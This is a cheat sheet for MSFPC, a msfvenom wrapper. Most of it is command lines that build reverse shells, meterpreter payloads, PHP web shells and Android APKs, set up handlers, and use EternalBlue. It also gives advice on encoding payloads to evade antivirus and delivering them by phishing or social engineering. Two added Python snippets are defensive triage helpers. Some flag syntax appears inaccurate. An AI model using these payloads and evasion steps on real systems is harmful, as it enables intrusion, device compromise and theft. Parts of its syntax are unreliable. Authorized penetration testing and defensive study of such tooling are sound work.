
MSFPC

Overview

MSFPC (MSFvenom Payload Creator) is a streamlined Bash wrapper around msfvenom that simplifies payload generation without memorizing complex syntax. Instead of crafting lengthy msfvenom commands, MSFPC uses simple parameters: target IP, port, and payload type.

Installation

Kali Linux / Debian-based

# MSFPC comes pre-installed in Kali Linux
which msfpc

# Or install manually
git clone https://github.com/g0tmi1k/msfpc.git
cd msfpc
chmod +x msfpc.sh
sudo ln -s "$(pwd)/msfpc.sh" /usr/local/bin/msfpc

macOS

brew tap g0tmi1k/msfpc
brew install msfpc

Manual Installation

git clone https://github.com/g0tmi1k/msfpc.git
cd msfpc
bash msfpc.sh <LHOST> <TYPE>

Basic Syntax

| Command | Description |
|---|---|
| `msfpc <LHOST> <TYPE>` | Generate payload with default settings |
| `msfpc <LHOST> <TYPE> <LPORT>` | Specify custom listening port |
| `msfpc <LHOST> <TYPE> <LPORT> <ENCODER>` | Add payload encoder |
| `msfpc -h` | Display help menu |
| `msfpc -v` | Show version information |

Payload Types

Windows Payloads

| Type | Description | Staged |
|---|---|---|
| `windows` | Windows reverse shell (auto-selects architecture) | No |
| `windows-staged` | Windows staged payload (meterpreter) | Yes |
| `windows-bind` | Windows bind shell (listening on target) | No |
| `windows/meterpreter/reverse_tcp` | Full meterpreter session | Yes |
| `windows/shell/reverse_tcp` | Simple cmd.exe shell | Yes |
| `windows/shell_reverse_tcp` | Stageless reverse shell | No |

Linux Payloads

| Type | Description | Staged |
|---|---|---|
| `linux` | Linux reverse shell (auto-selects architecture) | No |
| `linux-staged` | Linux staged payload | Yes |
| `linux-bind` | Linux bind shell | No |
| `linux/x86/meterpreter/reverse_tcp` | 32-bit meterpreter | Yes |
| `linux/x64/meterpreter/reverse_tcp` | 64-bit meterpreter | Yes |
| `linux/x86/shell/reverse_tcp` | 32-bit shell | Yes |

macOS Payloads

| Type | Description |
|---|---|
| `macos` | macOS reverse shell |
| `macos-staged` | macOS staged payload |
| `osx/x64/shell_reverse_tcp` | macOS 64-bit reverse shell |

Mobile & Web Payloads

| Type | Description | Format |
|---|---|---|
| `android` | Android APK payload | .apk |
| `android-staged` | Android staged meterpreter | .apk |
| `php` | PHP reverse shell | .php |
| `php-staged` | PHP staged payload | .php |
| `python` | Python reverse shell | .py |
| `python-staged` | Python staged payload | .py |
| `bash` | Bash reverse shell | .sh |
| `perl` | Perl reverse shell | .pl |
| `java` | Java reverse shell | .jar |
| `jsp` | Java Server Pages shell | .jsp |
| `aspx` | ASP.NET reverse shell | .aspx |

Staged vs Stageless Payloads

Staged Payloads

# Two-part delivery: small stub downloads full payload
msfpc 192.168.1.100 windows-staged 4444

# Pros: Smaller initial payload, evasion
# Cons: Two-stage delivery required, requires handler
# Use: Firewall constraints, low bandwidth

Stageless Payloads

# Full payload in one executable
msfpc 192.168.1.100 windows 4444

# Pros: Single executable, works without handler
# Cons: Larger file size, easier to detect
# Use: Direct execution, reliability required

Common Encoder Options

| Encoder | Description | Effectiveness |
|---|---|---|
| `x86/shikata_ga_nai` | Polymorphic XOR encoder | High |
| `x86/jmp_call_additive` | JMP/CALL XOR encoder | Medium |
| `x64/xor` | 64-bit XOR encoder | Medium |
| `x86/fnstenv_mov` | FPU instruction encoder | Medium |
| `x86/countdown` | Counter-based encoding | Low |

Using Encoders

# Single encoding iteration
msfpc 192.168.1.100 windows 4444 x86/shikata_ga_nai

# Multiple iterations (harder to detect)
msfpc 192.168.1.100 windows 4444 x86/shikata_ga_nai -i 5

Output Formats

MSFPC automatically detects format based on payload type:

| Format | Extensions | Use Case |
|---|---|---|
| Executable | .exe, .bin | Direct execution on Windows |
| Script | .py, .pl, .sh, .php | Interpretation by runtime |
| APK | .apk | Android installation |
| JAR | .jar | Java execution |
| ASP | .aspx, .asp | Web server shells |

Custom Output

# Specify output filename
msfpc 192.168.1.100 windows 4444 -o payload.exe

# List available formats
msfpc -l

Multi-Handler Setup

Using Resource Script

# Generate resource script for multi/handler
msfpc 192.168.1.100 windows 4444 -r

# Output: resource.rc (auto-generated)

Manual Multi-Handler

# Start msfconsole with resource script
msfconsole -r resource.rc

# Or configure manually in msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
run
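
For triage of a handler resource script found on a host or left behind after an engagement, the sketch below parses the `use`/`set`/`run` lines shown above into listener indicators and marks staged payload names, which imply a second-stage transfer on the wire. It is an added example, not code from MSFPC or Metasploit; the function names and the sample script are constructed for illustration, and the staged check is a naming heuristic based on the payload tables on this page.

```python
import shlex

# Constructed sample: the manual handler settings from this page, saved as a resource script.
SAMPLE_RC = """\
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
run
"""

def is_staged(payload):
    """Heuristic (assumption): a staged name ends in a bare stager such as
    'reverse_tcp'; a stageless name fuses it, e.g. 'shell_reverse_tcp'."""
    return payload.rsplit("/", 1)[-1].startswith(("reverse_", "bind_"))

def parse_handler_rc(text):
    """Return one dict per 'use <module>' block found in a resource script."""
    handlers, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            parts = shlex.split(line)
        except ValueError:          # unbalanced quote: fall back to whitespace split
            parts = line.split()
        cmd = parts[0].lower()
        if cmd == "use" and len(parts) >= 2:
            current = {"module": parts[1], "options": {}, "launched": False}
            handlers.append(current)
        elif current is None:
            continue                # settings outside any module block are ignored
        elif cmd in ("set", "setg") and len(parts) >= 3:
            current["options"][parts[1].upper()] = " ".join(parts[2:])
        elif cmd in ("run", "exploit"):
            current["launched"] = True
    return handlers

def listener_indicators(handlers):
    """Reduce handler blocks to (payload, host, port, staged) for log searches."""
    found = []
    for h in handlers:
        opts = h["options"]
        port = opts.get("LPORT", "")
        if h["module"].endswith("multi/handler") and port.isdigit():
            payload = opts.get("PAYLOAD", "unknown")
            found.append((payload, opts.get("LHOST"), int(port), is_staged(payload)))
    return found
```

The resulting host and port pairs can be searched in firewall, proxy and NetFlow logs to find systems that called back to the listener.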

Handler Commands in Meterpreter

| Command | Description |
|---|---|
| `sessions -l` | List active sessions |
| `sessions -i <ID>` | Interact with session |
| `sysinfo` | Get target system info |
| `getuid` | Get current user |
| `hashdump` | Dump SAM hashes (Windows) |

Quick Reference Examples

Windows Meterpreter Reverse Shell (Staged)

msfpc 192.168.1.10 windows-staged 8888 -r
# Generates: msfpc-output/windows-windows-meterpreter-reverse-tcp-8888.exe
# Resource file: resource.rc for multi/handler setup

Linux Stageless Reverse Shell

msfpc 10.0.0.50 linux 5555
# Generates: linux-x86-reverse-tcp-5555
# ELF executable, ready to run

Android APK Payload

msfpc 192.168.1.100 android 9999 -r
# Generates: android-reverse-tcp-9999.apk
# Install with: adb install android-reverse-tcp-9999.apk

PHP Web Shell

msfpc 192.168.1.100 php 7777
# Generates: php-reverse-tcp-7777.php
# Upload to web server and access via browser

Python Reverse Shell

msfpc 10.10.10.10 python 3333
# Generates: python-reverse-tcp-3333.py
# Execute: python3 python-reverse-tcp-3333.py

Windows with Encoding

msfpc 192.168.1.100 windows 4444 x86/shikata_ga_nai -i 3
# Generates encoded payload with 3 iterations
# Reduces AV detection

Common Scenarios

Post-Exploitation Staged Delivery

# Generate small initial payload
msfpc 192.168.1.100 windows-staged 4444 -r

# Upload to target via phishing/web exploit
# Minimal file size, requires handler listening
# Handler setup: msfconsole -r resource.rc

Firewall Evasion

# Use high port number (firewall bypass)
msfpc 192.168.1.100 windows-staged 8888 x86/shikata_ga_nai -i 5

# Encode multiple times to bypass IDS/AV

Web Application RCE

# For PHP vulnerability in web app
msfpc 192.168.1.100 php 5555

# Copy .php file to web directory
cp php-reverse-tcp-5555.php /var/www/html/shell.php

# Trigger via browser: http://target.com/shell.php

Mobile Penetration Test

# Generate APK for target Android device
msfpc 192.168.1.100 android 6666

# Install on rooted device or via phishing
adb install android-reverse-tcp-6666.apk

# Or use social engineering to get user to install

Output Directory Structure

# MSFPC creates organized output
~/msfpc-output/
├── windows-windows-meterpreter-reverse-tcp-4444.exe
├── resource.rc          # Multi-handler setup
├── payload.txt          # Command reference
└── handler.sh           # Handler launch script

Troubleshooting

| Issue | Solution |
|---|---|
| Command not found | Install msfpc or add to PATH |
| msfvenom errors | Ensure Metasploit Framework is installed |
| Port already in use | Use different LPORT value |
| Staged payload won’t connect | Verify multi-handler is running |
| Antivirus detection | Use encoder option: -x86/shikata_ga_nai -i 5 |
| Architecture mismatch | Specify x86 or x64 explicitly |

Integration with Other Tools

Combining with Reverse Shell Handlers

# MSFPC generates payload
msfpc 192.168.1.100 windows 4444

# Use with netcat if no Metasploit available
nc -lnvp 4444

# Or socat for more control
socat TCP-LISTEN:4444,reuseaddr EXEC:bash,pty,stderr

Delivery via Exploit Framework

# Generate payload
msfpc 192.168.1.100 windows-staged 8888 -r

# Use in MSFconsole exploit
use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 8888
exploit

Advanced Tips

Batch Payload Generation

# Generate multiple payloads for different targets
for ip in 192.168.1.{50..60}; do
  msfpc $ip windows-staged 4444
done

Obfuscation Techniques

# Chain multiple encoders
msfpc 192.168.1.100 windows 4444 x86/shikata_ga_nai -i 7

# Output as different format
msfpc 192.168.1.100 windows 4444 -o shellcode.bin

Resource Script Automation

# Auto-generate handler and launch
msfpc 192.168.1.100 windows-staged 4444 -r
msfconsole -r resource.rc < /dev/null &

# Payload ready for delivery

Security Best Practices

  • Always set up multi-handler before sending staged payloads
  • Use encoding on all payloads to evade antivirus
  • Clean up generated payloads after use
  • Store LHOST/LPORT securely (not in scripts)
  • Use VPN/proxy for actual operations
  • Test payloads in isolated lab environment first
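
To support the clean-up item above, this added example (not part of MSFPC) inventories files whose names follow the patterns shown in this page's examples and records a SHA-256 for each, so the artifacts can be listed in the engagement report, shared with the defending team for deconfliction, and then removed. The regular expression and the `classify`/`inventory` names are assumptions derived only from the file names that appear on this page.

```python
import hashlib
import re
from pathlib import Path

# File names as they appear in this page's examples:
#   <type>-[...-]<reverse|bind>-tcp-<port>[.ext]
PAYLOAD_NAME = re.compile(
    r"^(?P<type>[a-z]+)-(?:[a-z0-9]+-)*?(?P<direction>reverse|bind)-tcp-"
    r"(?P<port>\d{1,5})(?P<ext>\.[a-z0-9]+)?$"
)
# Helper files listed under "Output Directory Structure" on this page.
SUPPORT_FILES = {"resource.rc", "payload.txt", "handler.sh"}

def classify(name):
    """Return a dict describing a generated artifact, or None for other files."""
    if name in SUPPORT_FILES:
        return {"kind": "support", "type": None, "port": None}
    m = PAYLOAD_NAME.match(name)
    if m and int(m["port"]) <= 65535:
        return {"kind": "payload", "type": m["type"], "port": int(m["port"])}
    return None

def inventory(directory):
    """List leftover artifacts in a directory with their SHA-256, sorted by name."""
    rows = []
    for path in sorted(Path(directory).iterdir()):
        info = classify(path.name) if path.is_file() else None
        if info is None:
            continue
        info["name"] = path.name
        info["sha256"] = hashlib.sha256(path.read_bytes()).hexdigest()
        rows.append(info)
    return rows

if __name__ == "__main__":
    import sys
    for row in inventory(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(row["sha256"], row["kind"], row["name"])
```

Files written under a custom name are not matched by this pattern and have to be tracked separately.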